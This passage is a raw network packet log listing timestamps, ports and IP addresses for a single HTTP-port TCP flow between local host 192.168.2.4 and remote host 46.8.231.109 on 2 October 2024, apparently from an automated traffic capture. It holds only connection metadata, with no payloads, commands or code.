Oct 2, 2024 09:41:25.031723976 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031742096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031758070 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031771898 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031771898 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031771898 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031771898 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031771898 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031771898 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031785965 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031789064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031815052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031832933 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031861067 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031877041 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031887054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031894922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031898022 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031898022 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031909943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031918049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031936884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031954050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031971931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031989098 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032006025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032023907 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032038927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032038927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032038927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032038927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032038927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032040119 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032038927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032058001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032073975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032090902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032107115 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032124996 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032141924 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032159090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032161951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032161951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032161951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032161951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032161951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032161951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032176971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032193899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032211065 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032227993 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032244921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032262087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032265902 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032267094 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032267094 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032267094 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032267094 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032267094 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032279015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032295942 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032313108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032330036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032346010 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032354116 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032354116 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032354116 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032354116 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032354116 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032363892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032381058 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032398939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.032689095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032689095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032689095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032689095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.032690048 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.036894083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.036922932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.036940098 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.036945105 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.036967993 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.036974907 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.036987066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.037022114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.037055016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.037089109 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.037089109 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.037089109 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.037089109 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.037089109 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.037316084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.037355900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.037920952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.037939072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.037955999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.037974119 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038024902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038050890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038068056 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038084984 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038084984 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038084984 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038084984 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038084984 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038098097 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038125038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038142920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038161039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038178921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038197041 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038197041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038197041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038197041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038197041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038197041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038222075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038239956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038256884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038274050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038290977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038306952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038306952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038306952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038306952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038306952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038306952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038319111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038320065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038336039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038353920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038378954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038398027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038414001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038430929 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038448095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038470030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038480997 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038480997 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038480997 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038480997 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038480997 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038480997 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038494110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038521051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038537979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038554907 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038570881 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038588047 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038599968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038599968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038599968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038599968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038599968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038599968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038604021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038621902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038639069 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.038805008 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038805008 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038805008 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.038805962 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.110416889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.110443115 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.110462904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.110482931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.110501051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.110518932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.110536098 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.110572100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.110572100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.110572100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.110572100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.110572100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.110572100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.117897987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.117927074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.117944956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.117991924 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.118009090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.118026972 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.118071079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.118094921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.118113995 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.118115902 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.118115902 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.118115902 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.118115902 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.118115902 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.118132114 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.118136883 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.118154049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.118185043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.118185043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.118204117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.118206978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.118242025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.118268967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.118284941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.118290901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.118710995 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.118710995 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.118927956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.118989944 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119007111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119024992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119080067 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119107962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119124889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119136095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119136095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119137049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119137049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119143009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119241953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119267941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119285107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119328022 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119328022 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119328022 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119328022 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119369984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119415998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119434118 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119441032 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119457960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119474888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119499922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119550943 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119550943 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119550943 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119555950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119565010 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119565010 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119574070 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119605064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119637966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119668007 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119685888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119703054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119720936 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119736910 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119769096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119786978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119802952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119802952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119802952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119803905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119803905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119803905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119808912 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119826078 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119889975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119906902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119925022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119944096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119960070 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.119988918 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119988918 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119988918 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119988918 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119988918 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.119988918 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.120017052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.120034933 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.120063066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.120080948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.120110035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.120126963 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.120142937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.120189905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.120189905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.120218039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.120218039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.185429096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.190447092 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361063004 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361094952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361104965 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.361109018 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361124039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361126900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.361136913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361152887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361166000 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.361166000 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.361166954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361181021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361197948 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.361251116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361273050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361288071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361303091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361341000 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361354113 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361368895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361385107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361390114 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.361390114 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.361390114 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.361390114 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.361398935 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361479998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361493111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361506939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361521006 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361536026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361542940 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.361542940 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.361542940 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.361542940 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.361588001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361601114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361614943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361646891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.361646891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.361646891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.361661911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361675978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361690044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361706018 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.361772060 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.361772060 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.362159014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362221956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362236023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362292051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362306118 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362319946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362361908 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.362361908 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.362361908 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.362361908 CEST	49749	80	192.168.2.4	46.8.231.109
